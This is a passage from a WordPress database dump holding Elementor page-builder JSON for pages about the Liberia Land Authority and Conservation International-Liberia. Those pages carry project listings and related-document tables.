et_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"57\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17867,1602,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17868,2631,'_elementor_edit_mode','builder'),(17869,2631,'_elementor_template_type','wp-post'),(17870,2631,'_elementor_version','2.7.5'),(17871,2631,'_wp_page_template','default'),(17872,2631,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(17876,2632,'_elementor_edit_mode','builder'),(17877,2632,'_elementor_template_type','wp-post'),(17878,2632,'_elementor_version','2.7.5'),(17879,2632,'_wp_page_template','default'),(17880,2632,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(17883,2633,'_elementor_edit_mode','builder'),(17884,2633,'_elementor_template_type','wp-post'),(17885,2633,'_elementor_version','2.7.5'),(17886,2633,'_wp_page_template','default'),(17887,2633,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17890,2634,'_elementor_edit_mode','builder'),(17891,2634,'_elementor_template_type','wp-post'),(17892,2634,'_elementor_version','2.7.5'),(17893,2634,'_wp_page_template','default'),(17894,2634,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read 